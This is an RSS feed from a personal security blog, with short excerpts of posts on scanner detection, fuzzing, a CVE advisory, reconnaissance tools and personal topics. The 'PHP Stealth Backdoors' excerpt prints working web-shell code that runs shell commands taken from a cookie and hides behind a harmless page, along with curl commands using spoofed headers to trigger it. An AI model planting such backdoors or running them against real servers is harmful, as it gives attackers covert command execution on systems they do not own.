<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>rfdslabs</title>
	<atom:link href="http://www.rfdslabs.com.br/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://www.rfdslabs.com.br</link>
	<description>" To temperance . . . in moderation. "</description>
	<lastBuildDate>Mon, 22 Aug 2011 04:38:22 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>Detect Web Scanners</title>
		<link>http://www.rfdslabs.com.br/?p=417</link>
		<comments>http://www.rfdslabs.com.br/?p=417#comments</comments>
		<pubDate>Fri, 19 Aug 2011 02:04:52 +0000</pubDate>
		<dc:creator>rfds</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.rfdslabs.com.br/?p=417</guid>
		<description><![CDATA[How to detect/block WebApp Scanners Wikipedia said: &#8220;A web application security is a program witch comunicates with a web application through the web front-end in order to identify potential security vulnerabilities in the web aplication and architectural weaknesses. &#8220; The ideia about this is to explain how it&#8217;s simple to block this kind of scanners [...]]]></description>
		<wfw:commentRss>http://www.rfdslabs.com.br/?feed=rss2&#038;p=417</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHP Stealth Backdoors</title>
		<link>http://www.rfdslabs.com.br/?p=452</link>
		<comments>http://www.rfdslabs.com.br/?p=452#comments</comments>
		<pubDate>Mon, 06 Jun 2011 16:35:59 +0000</pubDate>
		<dc:creator>rfds</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://www.rfdslabs.com.br/?p=452</guid>
		<description><![CDATA[A PHP stealth backdoors collection. &#160; 1 -&#62; Using cookie &#60;?php @header(’Hidden-Field: '.@exec($_COOKIE['cmd'])); echo "&#60;p&#62;hello&#60;/p&#62;"; ?&#62; Example: curl ‘http://target/cookie.php’ -b ‘cmd=id’ -A ‘Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6;fr; rv:1.9.4.5) Gecko/20110606 Firefox/4.4.3′ -e ‘http://www.google.com/’ &#160; 2 -&#62; Using HTTP Headers &#60;?php @header(’Hidden-Field: '.@exec($_COOKIE['cmd'])); echo "&#60;p&#62;hello&#60;/p&#62;"; ?&#62; Example: curl -v ‘http://target/headers.php’ -b ‘cmd=id’ -A ‘Mozilla/5.0 [...]]]></description>
		<wfw:commentRss>http://www.rfdslabs.com.br/?feed=rss2&#038;p=452</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Information Disclosure with Pastebin.com</title>
		<link>http://www.rfdslabs.com.br/?p=440</link>
		<comments>http://www.rfdslabs.com.br/?p=440#comments</comments>
		<pubDate>Wed, 23 Mar 2011 03:19:55 +0000</pubDate>
		<dc:creator>rfds</dc:creator>
				<category><![CDATA[Fun]]></category>
		<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://www.rfdslabs.com.br/?p=440</guid>
		<description><![CDATA[The great Corelan released a tool to gathering information using www.pastebin.com &#160; &#8220;Introduction When conducting a pen-test, the process typically starts with the reconnaissance phase, the process of gathering information about your target(s) system, organization or person. Today, we want to present a tool that can be added to your reconnaissance toolkit. Text dump sites such [...]]]></description>
		<wfw:commentRss>http://www.rfdslabs.com.br/?feed=rss2&#038;p=440</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>My First PC CASE!</title>
		<link>http://www.rfdslabs.com.br/?p=431</link>
		<comments>http://www.rfdslabs.com.br/?p=431#comments</comments>
		<pubDate>Mon, 31 Jan 2011 01:55:47 +0000</pubDate>
		<dc:creator>rfds</dc:creator>
				<category><![CDATA[Fun]]></category>
		<category><![CDATA[Geek]]></category>

		<guid isPermaLink="false">http://www.rfdslabs.com.br/?p=431</guid>
		<description><![CDATA[OHH YEAH I found the front of my first computer. A 80486DX2. The name MANTEL was the company where my father bought the computer. Amazing!]]></description>
		<wfw:commentRss>http://www.rfdslabs.com.br/?feed=rss2&#038;p=431</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Apple Directory Services Memory Corruption -	CVE-2010-1840</title>
		<link>http://www.rfdslabs.com.br/?p=413</link>
		<comments>http://www.rfdslabs.com.br/?p=413#comments</comments>
		<pubDate>Thu, 11 Nov 2010 12:21:39 +0000</pubDate>
		<dc:creator>rfds</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.rfdslabs.com.br/?p=413</guid>
		<description><![CDATA[From: Rodrigo Branco Date: Thu, 11 Nov 2010 01:12:51 -0800 Dear List, I&#8217;m writing on behalf of the Check Point Vulnerability Discovery Team to publish the following vulnerability. Check Point Software Technologies &#8211; Vulnerability Discovery Team (VDT) http://www.checkpoint.com/defense/ Apple Directory Services Memory Corruption CVE-2010-1840 INTRODUCTION chfn, chpass and chsh dos not properly parse authname switch [...]]]></description>
		<wfw:commentRss>http://www.rfdslabs.com.br/?feed=rss2&#038;p=413</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>VirusTotal &#8211; Malware MD5 Check Tool</title>
		<link>http://www.rfdslabs.com.br/?p=379</link>
		<comments>http://www.rfdslabs.com.br/?p=379#comments</comments>
		<pubDate>Thu, 16 Sep 2010 02:37:35 +0000</pubDate>
		<dc:creator>rfds</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.rfdslabs.com.br/?p=379</guid>
		<description><![CDATA[Cool project from Mertsarica I&#8217;ts a simple python script for check malware/trojans/virus MD5 hashes on VirusTotal site or offline. BTW VirusTotal have a nice public API. http://www.virustotal.com/advanced.html Download: MalwareCheckTool]]></description>
		<wfw:commentRss>http://www.rfdslabs.com.br/?feed=rss2&#038;p=379</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fuzzing With man</title>
		<link>http://www.rfdslabs.com.br/?p=365</link>
		<comments>http://www.rfdslabs.com.br/?p=365#comments</comments>
		<pubDate>Sun, 12 Sep 2010 01:06:58 +0000</pubDate>
		<dc:creator>rfds</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.rfdslabs.com.br/?p=365</guid>
		<description><![CDATA[When I started studying about fuzzing, I had the following idea: The idea is to map the arguments of a  binary, through its manpage, using the man command. To my surprise this technique was very effective. The code maps all arguments of a binary and send random buffers to the outputs. Below is a short list [...]]]></description>
		<wfw:commentRss>http://www.rfdslabs.com.br/?feed=rss2&#038;p=365</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>explorer.exe stack overflow</title>
		<link>http://www.rfdslabs.com.br/?p=359</link>
		<comments>http://www.rfdslabs.com.br/?p=359#comments</comments>
		<pubDate>Sat, 20 Mar 2010 21:22:45 +0000</pubDate>
		<dc:creator>rfds</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.rfdslabs.com.br/?p=359</guid>
		<description><![CDATA[I began to study overflow in windows and I discovered a fancy stack overflow in explorer.exe To reproduce type the code below in windows (XP) command prompt: &#8212; SNIP &#8212; for %N in (1 2 3 1 2 3 1 2 3 1 2 3 1 2 3 1 2 3 1 2 3 1 [...]]]></description>
		<wfw:commentRss>http://www.rfdslabs.com.br/?feed=rss2&#038;p=359</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Using man for fuzzing to root</title>
		<link>http://www.rfdslabs.com.br/?p=330</link>
		<comments>http://www.rfdslabs.com.br/?p=330#comments</comments>
		<pubDate>Sun, 28 Jun 2009 01:14:11 +0000</pubDate>
		<dc:creator>rfds</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.rfdslabs.com.br/?p=330</guid>
		<description><![CDATA[Saiu na Thebug! Magazine meu artigo sobre fuzzing. Publiquei um Heap Overflow local para MacOSx e um fuzzer em python como prova de conceito. Check now -> http://www.thebugmagazine.org/magazine/bug04/0&#215;01-fuzz.txt]]></description>
		<wfw:commentRss>http://www.rfdslabs.com.br/?feed=rss2&#038;p=330</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Engenheiro</title>
		<link>http://www.rfdslabs.com.br/?p=319</link>
		<comments>http://www.rfdslabs.com.br/?p=319#comments</comments>
		<pubDate>Fri, 16 Jan 2009 01:44:38 +0000</pubDate>
		<dc:creator>rfds</dc:creator>
				<category><![CDATA[Fun]]></category>

		<guid isPermaLink="false">http://www.rfdslabs.com.br/?p=319</guid>
		<description><![CDATA[]]></description>
		<wfw:commentRss>http://www.rfdslabs.com.br/?feed=rss2&#038;p=319</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

